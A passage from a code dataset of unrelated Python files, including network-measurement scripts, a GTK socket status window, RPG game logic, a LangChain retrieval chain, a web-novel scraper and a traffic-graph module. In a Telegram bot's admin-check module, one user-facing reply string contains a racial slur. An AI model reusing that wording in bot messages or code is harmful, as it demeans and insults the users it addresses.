\"./chrome-fetch.py\",\n website])\n dot()\n\n # Mahimahi measure (multiple server)\n multi_measure = int(run([\"mm-webreplay\", MAHIMAHI_RECORD_DIR] +\n SHELLS + [\"./measure.py\", website]))\n dot()\n\n # Mahimahi measure (single server)\n single_measure = int(run([\"mm-webreplay\", \"--single-server\",\n MAHIMAHI_RECORD_DIR] + SHELLS + [\"./measure.py\", website]))\n dot()\n\n atomic_write(\"%d,%d,%d,%d,%d\\n\" % (wpr_raw_measure, wpr_measure,\n mahimahi_raw_measure, multi_measure, single_measure),\n str(result_file))\n end_time = time.perf_counter()\n\n print(\" {0}\".format(end_time - start_time), file=sys.stderr)\n\n success = True\n break\n except Exception as e:\n print(e, \"retrying\", file=sys.stderr)\n\n if not success:\n print(\"Giving up on %s...\" % website, file=sys.stderr)\n return\n\n\ndef main():\n print(\"DELAY = %d, TRACE = %s\" % (DELAY, TRACE), file=sys.stderr)\n print(file=sys.stderr)\n\n result_path = Path(MEASURE_DIR)\n if not result_path.exists():\n result_path.mkdir()\n for website in sys.stdin:\n website = website.strip()\n if not website: break\n measure(website, result_path)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n sys.exit(\"Usage: ./run.py user\")\n\n try:\n pw_record = pwd.getpwnam(sys.argv[1])\n except KeyError:\n sys.exit(\"User %s doesn't exist\", sys.argv[1])\n\n def demote():\n user_uid = pw_record.pw_uid\n user_gid = pw_record.pw_gid\n os.setgid(user_gid)\n os.setuid(user_uid)\n\n main()\n print(\"DONE!\", file=sys.stderr)\n","repo_name":"zhangwen0411/cs244-pa3-mahimahi","sub_path":"previous/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5913,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"33258123185","text":"import socket\nimport select\nimport multiprocessing\nfrom const import HOST,PORT\n\n# Try to import Gtk for Python 3\ntry:\n\tfrom gi.repository import Gtk\n\tfrom gi.repository import GObject\nexcept:\n# If it doesn't work, try to import for Python 2\n\timport gtk as Gtk\n\timport gobject as GObject\n\nclass StatusWindow(Gtk.Window):\n\tdef __init__(self):\n\t\tGtk.Window.__init__(self)\n\t\tself.set_title(\"Contrôle de la pige\")\n\t\tself.set_size_request(600, 150)\n\t\tself.set_resizable(False)\n\t\t\n\t\tself.psbar = Gtk.ProgressBar()\n\t\tself.label = Gtk.Label()\n\t\tself.__label_set_status(False)\n\t\tself.level = multiprocessing.Value('d',0.0)\n\t\tself.running = multiprocessing.Value('b',False)\n\t\t\n\t\tself.vbox = Gtk.VBox(spacing=8)\n\t\tself.add(self.vbox)\n\t\tself.vbox.pack_start(self.psbar, True, True, 8)\n\t\tself.vbox.pack_start(self.label, False, False, 8)\n\t\t\n\t\tself.timer = GObject.timeout_add(20, self.__refresh)\n\t\t\n\t\tself.run_thread = multiprocessing.Value('b',True)\n\t\tmultiprocessing.Process(target=self.__server_loop,args=(self.level,self.running,self.run_thread)).start()\n\t\t\n\tdef stop_threads(self):\n\t\tself.run_thread.value = False\n\t\t\n\tdef __refresh(self):\n\t\tself.__label_set_status(self.running.value)\n\t\tself.psbar.set_fraction(self.level.value)\n\t\treturn True\n\t\n\tdef __label_set_status(self,b):\n\t\tif b:\n\t\t\tself.label.set_markup(\"Enregistrement...\")\n\t\telse:\n\t\t\tself.label.set_markup(\"Pige stoppée\")\n\t\n\tdef __server_loop(self, level_value, running_recorder, run_thread):\n\t\tdef read_line(s):\n\t\t\tret = ''\n\t\t\twhile True:\n\t\t\t\tc = s.recv(1).decode('utf-8','ignore')\n\t\t\t\tif c == '\\n' or c =='\\r' or c == '':\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tret += c\n\t\t\treturn ret\n\t\t\n\t\tclient_count = 0\n\t\t\n\t\tself.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\tself.s.bind((HOST, PORT))\n\t\tself.s.listen(5)\n\t\tself.s.settimeout(1)\n\t\t\n\t\twhile run_thread.value:\n\t\t\ttry:\n\t\t\t\tconn, addr = self.s.accept()\n\t\t\t\tif conn:\n\t\t\t\t\trunning_recorder.value = True\n\t\t\t\t\twhile run_thread.value:\n\t\t\t\t\t\tdata = read_line(conn)\n\t\t\t\t\t\tif not data:\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tlevel = float(data[:-1])/100\n\t\t\t\t\t\tlevel_value.value = level\n\t\t\t\t\tconn.close()\n\t\t\t\t\tlevel_value.value = 0\n\t\t\t\t\trunning_recorder.value = False\n\t\t\texcept:\n\t\t\t\trunning_recorder.value = False\n\nwin = StatusWindow()\nwin.connect(\"delete-event\", Gtk.main_quit)\nwin.show_all()\nGtk.main()\nwin.stop_threads()\nexit(0)\n","repo_name":"tiennotg/pigix","sub_path":"status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38988538794","text":"import copy\r\nimport random\r\nimport sys\r\nsys.path.append(\"../RPG2v3_def\")\r\nfrom rpg2_classdefinitions import (Player_PC, Pet_NPC, ItemBag_PC,\r\n Spell_PC, Monster_NPC, Weapon_PC,\r\n Armor_PC, QuestItems_NPC, Access_NPC)\r\nimport rpg2_party_management_functions as party_func\r\nfrom rpg2_constants import Constants\r\nfrom rpg2_constant_lists import List_Constants\r\nfrom rpg2_constant_quests import Q_Constants\r\nQ = Q_Constants()\r\nL = List_Constants()\r\nC = Constants()\r\nimport rpg2_level_up_function as lvlup_func\r\n#hunter will be part of the monster hunter guild\r\n#hunter will be a class that focuses on poison, traps and animal companion\r\nname = \"Hunter\"\r\nmaxhp = C.LVL_UP_HP_MID\r\natk = C.LVL_UP_ATK_MID\r\ndefense = C.LVL_UP_DEF_MID\r\nskill = C.LVL_UP_SKL_HIGH\r\n#not a spell caster\r\nmana = C.LVL_UP_MANA_LOW\r\n#starting stats\r\nhunter = Player_PC(\"Hunter\", 1, 15, 15, 3, 3, 5, 0, 0)\r\n#hunter comes with an animal companion\r\n#this summon will be much more focused on attacking\r\ncompanion = Pet_NPC(\"Spirit Animal\", 1, 5)\r\n'''#hunters are naturally trained at observation\r\n'observe, will give them and their ally a bonus to attack'\r\n#hunters need to take care of their weapons\r\n'buff, will boost their weapon effect'\r\n#hunters need to be able to deal with poison and injuries\r\n'heal, will greatly decrease poison'\r\n#hunters work with their companions\r\n'command, will allow their ally to perform two actions'\r\n#hunters weaken their prey first\r\n'debuff, decrease enemy stats based on poison'\r\n#hunters use traps and tools\r\n'throw explosive, will send a bomb into the enemy party'\r\n'the bomb can be damaging or poisoning'''\r\n\r\n\r\n#method to upgrade the spirit companion\r\ndef companion_upgrade(p_npc, q_i, a_i):\r\n if a_i.rank > Q.GOLD and p_npc.stage < 3:\r\n print (\"Looks like you're ready for the next step. \")\r\n if a_i.rank > Q.MASTER and p_npc.stage < 6:\r\n print (\"You've come a long way. \")\r\n print (\"I think you're ready for the next stage. \")\r\n print (\"I can help you strengthen your BOND or TRAIN. B/T? \")\r\n if p_npc.stage < C.STAGE_LIMIT:\r\n if a_i.rank <= Q.GOLD and p_npc.stage >= 2:\r\n print (\"Looks like you need more experience. \")\r\n if a_i.rank <= Q.MASTER and p_npc.stage >= 5:\r\n print (\"You're still lacking. \")\r\n else:\r\n print (\"You've done a lot together. \")\r\n print (\"I can see that your bond is strong. \")\r\n print (\"Do you want me to help you manifest that bond? \")\r\n print (\"I'll need \", p_npc.atk ** C.INCREASE_EXPONENT, \"mana gem to do it. \")\r\n check = input(\"YES/NO? Y/N? \")\r\n if check.upper() == \"Y\" and q_i.managem >= p_npc.atk ** C.INCREASE_EXPONENT:\r\n q_i.managem -= p_npc.atk ** C.INCREASE_EXPONENT\r\n lvlup_func.spirit_stage_up(p_npc)\r\n else:\r\n print (\"Come back when you're ready. \")\r\n elif p_npc.stage == C.STAGE_LIMIT:\r\n print (\"You want to help your companion train? \")\r\n print (\"I'll need \", p_npc.atk * C.INCREASE_EXPONENT, \"mana gem to do it. \")\r\n check = input(\"YES/NO? Y/N? \")\r\n if check.upper() == \"Y\" and q_i.managem >= p_npc.atk * C.INCREASE_EXPONENT:\r\n q_i.managem -= p_npc.atk * C.INCREASE_EXPONENT\r\n lvlup_func.pet_atk_up(p_npc)\r\n else:\r\n print (\"Come back when you're ready. \")\r\n#function that adds the hunter to the party\r\ndef add_hunter(h_p, p_npc):\r\n hro = None\r\n copy_hero = copy.copy(hunter)\r\n for hero in h_p:\r\n if \"Hunter\" in hero.name:\r\n hro = hero\r\n if hro == None:\r\n party_func.add_to_party(h_p, copy_hero)\r\n else:\r\n print (\"You already have a hunter. \")\r\n cmp = None\r\n copy_comp = copy.copy(companion)\r\n for ally in p_npc:\r\n if \"Spirit\" in ally.name:\r\n cmp = ally\r\n if cmp == None:\r\n p_npc.append(copy_comp)\r\n\r\n","repo_name":"DXing330/pygame-RPG","sub_path":"pygameRPG/RPG2v3/RPG2v3_functions/RPG2v3_quest/rpg2_hunter_function.py","file_name":"rpg2_hunter_function.py","file_ext":"py","file_size_in_byte":4369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2650458527","text":"\"\"\"\n=========\nAssociate\n=========\n\nWidgets for association rules.\n\n\"\"\"\n\n# Category description for the widget registry\n\nNAME = \"Optical Elements\"\n\nDESCRIPTION = \"Widgets for Shadow Optical Elements.\"\n\n#BACKGROUND = \"#bcf7ff\"\nBACKGROUND = \"#A9D0F5\"\n\nICON = \"icons/opticalElements.png\"\n\n\nPRIORITY = 102\n","repo_name":"oasys-kit/ShadowOui","sub_path":"orangecontrib/shadow/widgets/optical_elements/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"} +{"seq_id":"26630140851","text":"# Copyright (C) 2020 - 2021 Divkix. All rights reserved. Source code available under the AGPL.\r\n#\r\n# This file is part of Alita_Robot.\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU Affero General Public License as\r\n# published by the Free Software Foundation, either version 3 of the\r\n# License, or (at your option) any later version.\r\n\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU Affero General Public License for more details.\r\n\r\n# You should have received a copy of the GNU Affero General Public License\r\n# along with this program. If not, see .\r\n\r\n\r\nfrom pyrogram.types import CallbackQuery, Message\r\nfrom traceback import format_exc\r\n\r\nfrom alita import DEV_USERS, LOGGER, OWNER_ID, SUDO_USERS\r\n\r\nSUDO_LEVEL = SUDO_USERS + DEV_USERS + [int(OWNER_ID)]\r\nDEV_LEVEL = DEV_USERS + [int(OWNER_ID)]\r\n\r\n\r\nasync def admin_check(m: Message or CallbackQuery) -> bool:\r\n \"\"\"Checks if user is admin or not.\"\"\"\r\n if isinstance(m, Message):\r\n user_id = m.from_user.id\r\n if isinstance(m, CallbackQuery):\r\n user_id = m.message.from_user.id\r\n\r\n try:\r\n if user_id in SUDO_LEVEL:\r\n return True\r\n except Exception as ef:\r\n LOGGER.error(format_exc())\r\n\r\n user = await m.chat.get_member(user_id)\r\n admin_strings = (\"creator\", \"administrator\")\r\n\r\n if user.status not in admin_strings:\r\n reply = \"Nigga, you're not admin, don't try this explosive shit.\"\r\n try:\r\n await m.edit_text(reply)\r\n except Exception as ef:\r\n await m.reply_text(reply)\r\n LOGGER.error(ef)\r\n LOGGER.error(format_exc())\r\n return False\r\n\r\n return True\r\n\r\n\r\nasync def check_rights(m: Message or CallbackQuery, rights) -> bool:\r\n \"\"\" Check Admin Rights \"\"\"\r\n if isinstance(m, Message):\r\n user_id = m.from_user.id\r\n chat_id = m.chat.id\r\n app = m._client\r\n if isinstance(m, CallbackQuery):\r\n user_id = m.message.from_user.id\r\n chat_id = m.message.chat.id\r\n app = m.message._client\r\n\r\n user = await app.get_chat_member(chat_id, user_id)\r\n if user.status == \"member\":\r\n return False\r\n admin_strings = (\"creator\", \"administrator\")\r\n if user.status in admin_strings:\r\n return bool(getattr(user, rights, None))\r\n return False\r\n\r\n\r\nasync def owner_check(m: Message or CallbackQuery) -> bool:\r\n \"\"\"Checks if user is owner or not.\"\"\"\r\n if isinstance(m, Message):\r\n user_id = m.from_user.id\r\n if isinstance(m, CallbackQuery):\r\n user_id = m.message.from_user.id\r\n m = m.message\r\n\r\n try:\r\n if user_id in SUDO_LEVEL:\r\n return True\r\n except Exception as ef:\r\n LOGGER.info(ef, m)\r\n LOGGER.error(format_exc())\r\n\r\n user = await m.chat.get_member(user_id)\r\n\r\n if user.status != \"creator\":\r\n if user.status == \"administrator\":\r\n reply = \"Stay in your limits, or lose adminship too.\"\r\n else:\r\n reply = \"You ain't even admin, what are you trying to do?\"\r\n try:\r\n await m.edit_text(reply)\r\n except Exception as ef:\r\n await m.reply_text(reply)\r\n LOGGER.error(ef)\r\n LOGGER.error(format_exc())\r\n\r\n return False\r\n\r\n return True\r\n","repo_name":"Hirojazz/Tessia","sub_path":"alita/utils/admin_check.py","file_name":"admin_check.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"25551380788","text":"\"\"\"This module contains functions for loading a ConversationalRetrievalChain\"\"\"\n\nimport logging\n\nimport wandb\nfrom langchain.chains import ConversationalRetrievalChain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.embeddings import OpenAIEmbeddings\nfrom langchain.vectorstores import Chroma\nfrom prompts import load_chat_prompt\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef load_vector_store(wandb_run: wandb.run, openai_api_key: str) -> Chroma:\n \"\"\"Load a vector store from a Weights & Biases artifact\n Args:\n run (wandb.run): An active Weights & Biases run\n openai_api_key (str): The OpenAI API key to use for embedding\n Returns:\n Chroma: A chroma vector store object\n \"\"\"\n # load vector store artifact\n vector_store_artifact_dir = wandb_run.use_artifact(\n wandb_run.config.vector_store_artifact, type=\"search_index\"\n ).download()\n embedding_fn = OpenAIEmbeddings(openai_api_key=openai_api_key)\n # load vector store\n vector_store = Chroma(\n embedding_function=embedding_fn, persist_directory=vector_store_artifact_dir\n )\n\n return vector_store\n\n\ndef load_chain(wandb_run: wandb.run, vector_store: Chroma, openai_api_key: str):\n \"\"\"Load a ConversationalQA chain from a config and a vector store\n Args:\n wandb_run (wandb.run): An active Weights & Biases run\n vector_store (Chroma): A Chroma vector store object\n openai_api_key (str): The OpenAI API key to use for embedding\n Returns:\n ConversationalRetrievalChain: A ConversationalRetrievalChain object\n \"\"\"\n retriever = vector_store.as_retriever()\n llm = ChatOpenAI(\n openai_api_key=openai_api_key,\n model_name=wandb_run.config.model_name,\n temperature=wandb_run.config.chat_temperature,\n max_retries=wandb_run.config.max_fallback_retries,\n )\n chat_prompt_dir = wandb_run.use_artifact(\n wandb_run.config.chat_prompt_artifact, type=\"prompt\"\n ).download()\n qa_prompt = load_chat_prompt(f\"{chat_prompt_dir}/prompt.json\")\n qa_chain = ConversationalRetrievalChain.from_llm(\n llm=llm,\n chain_type=\"stuff\",\n retriever=retriever,\n combine_docs_chain_kwargs={\"prompt\": qa_prompt},\n return_source_documents=True,\n )\n return qa_chain\n\n\ndef get_answer(\n chain: ConversationalRetrievalChain,\n question: str,\n chat_history: list[tuple[str, str]],\n):\n \"\"\"Get an answer from a ConversationalRetrievalChain\n Args:\n chain (ConversationalRetrievalChain): A ConversationalRetrievalChain object\n question (str): The question to ask\n chat_history (list[tuple[str, str]]): A list of tuples of (question, answer)\n Returns:\n str: The answer to the question\n \"\"\"\n result = chain(\n inputs={\"question\": question, \"chat_history\": chat_history},\n return_only_outputs=True,\n )\n response = f\"Answer:\\t{result['answer']}\"\n return response\n","repo_name":"wandb/edu","sub_path":"llm-apps-course/src/chain.py","file_name":"chain.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":310,"dataset":"github-code","pt":"61"} +{"seq_id":"23634032301","text":"import os, sys\r\n\r\n\r\nd = {'a' : 'y' ,\r\n 'b' : 'h',\r\n 'c':'e',\r\n 'd':'s',\r\n 'e':'o',\r\n 'f':'c',\r\n 'g':'v',\r\n 'h':'x',\r\n 'i':'d',\r\n 'j':'u',\r\n 'k':'i',\r\n 'l':'g',\r\n 'm':'l',\r\n 'n':'b',\r\n 'o':'k',\r\n 'p':'r',\r\n 'q':'z',\r\n 'r':'t',\r\n 's':'n',\r\n 't':'w',\r\n 'u':'j',\r\n 'v':'p',\r\n 'w':'f',\r\n 'x':'m',\r\n 'y':'a',\r\n 'z':'q',\r\n ' ': ' '}\r\n\r\n\r\nif __name__ == \"__main__\":\r\n #run main \r\n lines = open( \"A-small-attempt2.in\" ).readlines()\r\n #lines = sys.stdin.readlines()\r\n out = open( \"A-small-attempt2.out\" , 'w' )\r\n x = int( lines[0] )\r\n count = 0\r\n output = \"Case #{0}: {1}\\n\"\r\n for G in lines[1:]:\r\n if count == x:\r\n break\r\n count += 1\r\n translation = \"\"\r\n for char in G.strip( '\\n' ):\r\n translation += d[char]\r\n out.write( output.format( count, translation ) )\r\n\r\n out.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_95/2557.py","file_name":"2557.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30644860814","text":"# find count of all the subarrays with sum 5 and length 3\n# ans = 2\n\narr = [1,2,3,0,5,1,23,0,4,1]\ncount = 0\nfor i in range(0, len(arr)):\n sum = 0\n length = 0\n for j in range(i, len(arr)):\n sum = sum + arr[j]\n length+=1\n if sum == 5 and length == 3:\n count = count+1\n\nprint(count)\n\n","repo_name":"adityabhanu/DSA-Practice-Python","sub_path":"Arrays/arr02.py","file_name":"arr02.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7854156054","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom sklearn.neighbors import VALID_METRICS\nfrom tqdm import tqdm\nfrom time import sleep\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36'}\nurl_header = 'https://kakuyomu.jp/works'\n\ndef get_text(url, gyokan=False):\n print(f'Start each page at {url}')\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n # print(soup)\n text = soup.find(class_='widget-episode-inner')\n texts = [line.text for line in text.find_all('p')]\n texts = [line.replace('\\u3000', '') for line in texts]\n if not gyokan:\n texts = [line for line in texts if line != '']\n return texts\n\ndef get_page(code, gyokan=False):\n url = url_header+ '/' + code \n print(f'url : {url}')\n response = requests.get(url, headers=headers)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n title = soup.find(id=\"workTitle\")\n title = title.get_text()\n author = soup.find(id=\"workAuthor\")\n author = author.get_text()\n indices = soup.find(class_='widget-toc-main')\n if indices == None:\n raise ValueError(f\"Indices not found... at {url}\")\n else:\n hrefs = ['/'.join(a['href'].split('/')[-3:]) for a in indices.find_all('a')]\n #hrefs = sorted(hrefs, key=lambda x: int(x.split('/')[-1]))\n print(f'length of hrefs {len(hrefs)}')\n for href in tqdm(hrefs):\n url = url_header + '/' + href\n lines = get_text(url, gyokan)\n sleep(1.0)\n with open(code + '.txt', 'a', encoding='utf-8') as f:\n f.write('\\n'.join(lines) + \"\\n\")\n rename_file(code, title, author)\n\nimport os\nimport re\ninvalid_string = re.compile(r'[\\\\/:*?\"<<>|]+')\ndef rename_file(code, title, author):\n title = invalid_string.sub('', title)\n author = author.split('\\n')[-2]\n author = invalid_string.sub('', author)\n os.rename(code + '.txt', f'{title}_{author}.txt')\n\nimport argparse\n\nif __name__=='__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--url', type=str)\n\n args = parser.parse_args()\n code = args.url.split('/')[-1]\n print(f'code {code}')\n get_page(code, gyokan=False)","repo_name":"blackpopo/QiitaLaboratory","sub_path":"kakuyomu_scraper.py","file_name":"kakuyomu_scraper.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23545633521","text":"# /usr/bin/env python\r\n# -*- coding: utf8 -*-\r\n\r\nIMP = \"IMPOSSIBLE\"\r\nHAPPY = \"+\"\r\nBLANK = \"-\"\r\n\r\n\r\ndef convert_row_to_int(row):\r\n return [1 if p == HAPPY else -1 for p in row]\r\n\r\n\r\ndef convert_int_to_row(int_row):\r\n return \"\".join([HAPPY if p == 1 else BLANK for p in int_row])\r\n\r\n\r\nclass PancakeRow:\r\n\r\n __slots__ = (\"row\",\r\n \"step\",\r\n \"size_row\",\r\n \"eval_state\",\r\n \"previous_pos\")\r\n fsize = None\r\n\r\n def __init__(self,\r\n s,\r\n k,\r\n step=0,\r\n previous_pos=None):\r\n self.row = s\r\n self.step = step\r\n self.size_row = len(s)\r\n self.eval_state = self.row.count(1)\r\n self.previous_pos = previous_pos\r\n\r\n def all_happy(self):\r\n return self.eval_state == self.size_row\r\n\r\n def flip(self, pos):\r\n if pos == self.previous_pos:\r\n # print(\"REJECTED ppos\", convert_int_to_row(self.row), pos)\r\n return None\r\n if self.size_row - pos < self.fsize:\r\n # print(\"REJECTED hight pos\", convert_int_to_row(self.row), pos, (self.size_row - pos, self.fsize))\r\n return None\r\n else:\r\n new_row = [-1 * p if pos <= i < pos +\r\n self.fsize else p for i, p in enumerate(self.row)]\r\n return PancakeRow(new_row,\r\n self.fsize,\r\n step=self.step + 1,\r\n previous_pos=pos)\r\n\r\n\r\nif __name__ == '__main__':\r\n T = int(input())\r\n for ti in range(T):\r\n test_case = input()\r\n S, K = test_case.split()\r\n K = int(K)\r\n Sint = convert_row_to_int(S)\r\n PancakeRow.fsize = K\r\n prow = PancakeRow(Sint, K)\r\n\r\n if prow.all_happy():\r\n print(\"Case #{}: {}\".format(ti + 1, 0))\r\n continue\r\n row_try = [prow]\r\n\r\n max_level = 10000\r\n level = 0\r\n STOP = False\r\n already_tested_pattern = []\r\n while row_try != [] and level < max_level and not STOP:\r\n level += 1\r\n evaluation = [r.eval_state for r in row_try]\r\n maxi = max(evaluation)\r\n for counter in range(evaluation.count(maxi)):\r\n idxmax = evaluation.index(maxi)\r\n row = row_try.pop(idxmax)\r\n evaluation.pop(idxmax)\r\n if row.row in already_tested_pattern:\r\n continue\r\n else:\r\n already_tested_pattern.append(row.row)\r\n for pos in range(0, row.size_row - (K - 1)):\r\n new_row = row.flip(pos)\r\n if new_row is not None:\r\n if new_row.all_happy():\r\n print(\"Case #{}: {}\".format(ti + 1, new_row.step))\r\n STOP = True\r\n break\r\n row_try.append(new_row)\r\n if STOP:\r\n break\r\n if level >= max_level or (row_try == [] and not STOP):\r\n print(\"Case #{}: {}\".format(ti + 1, IMP))\r\n # print()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3171.py","file_name":"3171.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41129985917","text":"from data.scats import ScatsData\nfrom math import radians, cos, sin, asin, sqrt, degrees, acos, floor\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\nSCATS_DATA = ScatsData()\n\n\nclass Vector(object):\n\n def __init__(self, x=0, y=0):\n self.x = x\n self.y = y\n\n def angle(self, other):\n \"\"\"Angle of vectors\n Calculate the angle between self and other vector\n # Arguements\n other: 2D vector, vector to check angle against\n # Returns\n angle_in_degrees: Float, angle between provided vectors\n \"\"\"\n\n dot_product = self.x * other.x + self.y * other.y\n mod_of_vector = sqrt(self.x ** 2 + self.y ** 2) * sqrt(other.x ** 2 + other.y ** 2)\n angle = dot_product / mod_of_vector\n angle_in_degrees = degrees(acos(angle))\n return angle_in_degrees\n\n def distance(self, other):\n \"\"\"Distance\n Calculate distance to other vector\n # Arguements\n other: 2D vector\n # Returns\n result: Float, distance from self to other\n \"\"\"\n\n lon1 = radians(self.x)\n lon2 = radians(other.x)\n lat1 = radians(self.y)\n lat2 = radians(other.y)\n\n # Haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2) ** 2 + cos(lat1) * cos(lat2) * sin(dlon / 2) ** 2\n\n c = 2 * asin(sqrt(a))\n\n # Radius of earth in kilometers. Use 3956 for miles\n r = 6371\n\n # calculate the result\n return (c * r)\n\n def to_tuple(self):\n lon = radians(self.x)\n lat = radians(self.y)\n\n a = sin\n\n return (self.x, self.y)\n\n def __sub__(self, other):\n return Vector(other.x - self.x, other.y - self.y)\n\n def __neg__(self):\n return Vector(-self.x, -self.y)\n\n def __str__(self):\n return \"({0}, {1})\".format(self.x, self.y)\n\n\nclass Node(object):\n\n def __init__(self, scats_number, coordinates):\n self.scats_number = scats_number\n self.coordinates = Vector(coordinates[0], coordinates[1])\n self.incoming_connections = []\n self.outgoing_connections = []\n\n def find_outgoing_connections(self, graph):\n \"\"\"Find outgoing connections\n Searches through incoming connections to find outgoing connections\n # Arguements\n graph: Node List, represents the node graph\n # Returns\n None\n \"\"\"\n\n for connection in self.incoming_connections:\n connection = self.get_respective_outgoing_connection(connection, graph)\n if connection != None:\n self.outgoing_connections.append(connection)\n\n def get_respective_outgoing_connection(self, connection, graph):\n \"\"\"Get respective outgoing connection\n Gets an incomming connection from another node which is the inverse of the provided connection\n # Arguements\n connection: Connection, the incoming connection\n graph: Node List, represents the node graph\n # Returns\n best_connection: the connection most probable to be the inverse of the provided connection\n \"\"\"\n\n # Find all valid connections\n valid_connections = []\n for node in graph.nodes:\n for external_connection in node.incoming_connections:\n if self.connections_share_one_street(connection, external_connection):\n if self.connection_within_angle_range(connection, external_connection):\n valid_connections.append(external_connection)\n\n if len(valid_connections) < 1:\n return\n\n # Select best connection\n best_connection = valid_connections[0]\n origin = connection.node.coordinates\n for external_connection in valid_connections:\n\n current_position = external_connection.node.coordinates\n best_position = best_connection.node.coordinates\n\n if origin.distance(current_position) < origin.distance(best_position):\n best_connection = external_connection\n elif (origin.distance(current_position) == origin.distance(best_position)):\n if origin.angle(-current_position) < origin.angle(-best_position):\n best_connection = external_connection\n return best_connection\n\n def connections_share_one_street(self, connection_a, connection_b):\n \"\"\"Connections share one street\n Checks if the provided connections share ONLY one street\n # Arguements\n connection_a: Connection\n connection_b: Connection\n # Returns\n result: bool, true if only one street overlaps\n \"\"\"\n\n if connection_a.contains_streets_count(connection_b.streets) == 1:\n return True\n return False\n\n def connection_within_angle_range(self, connection_a, connection_b):\n \"\"\"Connection within angle range\n Checks if connection_b falls within 45 degrees of the direction connection_a is heading\n # Arguements\n connection_a: Connection, origin\n connection_b: Connection, target\n # Returns\n result: bool, true if within 45 degrees\n \"\"\"\n\n vector_a = connection_a.direction\n vector_b = connection_a.node.coordinates - connection_b.node.coordinates\n if abs(vector_a.angle(vector_b)) < 45:\n return True\n return False\n\n\nclass Connection(object):\n\n def __init__(self, name, c_id, node):\n self.node = node\n self.streets = self.get_streets_from_name(name)\n self.direction = self.get_vector_from_name(name)\n self.id = c_id\n\n def get_model(self, model_name):\n \"\"\"Get model\n Locates the model predicted values in JSON file\n # Arguements\n model_name: string, name of the model to locate\n # Returns\n model: list, predicted values for this connection\n \"\"\"\n\n try:\n with open('predictedvalues.json', 'r') as openfile:\n\n # Reading from json file\n json_object = json.load(openfile)\n model = json_object[model_name][str(self.node.scats_number)][str(self.id)]\n return model\n except Exception as e:\n print(\"{0} model for junction {1} could not be found!\".format(model_name, self.show_connection()))\n\n def contains_streets_count(self, streets):\n \"\"\"Contains streets count\n Counts how many streets overlap in self.streets and provided list\n # Arguements\n streets: list, values to overlap with\n # Returns\n intersect_count: int, count of overlapping values\n \"\"\"\n\n intersect_count = 0\n for street in streets:\n if street in self.streets:\n intersect_count += 1\n return intersect_count\n\n def show_connection(self):\n \"\"\" Returns readable information as string\"\"\"\n\n return \"{0} - {1} {2}\".format(self.node.scats_number, self.streets[0], self.streets[1])\n\n def get_vector_from_name(self, name):\n \"\"\"Get vector from name\n Uses name to determine direction of connection as a vector\n # Arguements\n name: string, name of location\n # Returns\n result: Vector, direction represented as a vector\n \"\"\"\n\n words = name.upper().split(' OF ')\n direction = words[0].split()\n direction = direction[len(direction) - 1:][0]\n if direction == \"N\":\n return Vector(0, 1)\n elif direction == \"NE\":\n return Vector(1, 1)\n elif direction == \"E\":\n return Vector(1, 0)\n elif direction == \"SE\":\n return Vector(1, -1)\n elif direction == \"S\":\n return Vector(0, -1)\n elif direction == \"SW\":\n return Vector(-1, -1)\n elif direction == \"W\":\n return Vector(-1, 0)\n elif direction == \"NW\":\n return Vector(-1, 1)\n else:\n return None\n\n def get_streets_from_name(self, name):\n \"\"\"Get streets from name\n Convert name into list of streets\n # Arguements\n name: string, name of location\n # Returns\n result: list, streets of location\n \"\"\"\n words = name.upper().split(' OF ')\n streetB = words[1]\n streetA = words[0].split()\n streetA = ' '.join(streetA[:len(streetA) - 1])\n return [streetA, streetB]\n\n\nclass Graph(object):\n\n def __init__(self):\n self.nodes = []\n\n def get_path(self, origin, destination, restrictions):\n \"\"\"Get path\n Searchs graph to find a path from one node to the other, will not use restricted nodes\n # Arguements\n origin: Node, starting point for path\n destination: Node, goal for search\n restrictions: list of lists, restricts nodes at specific indexes in 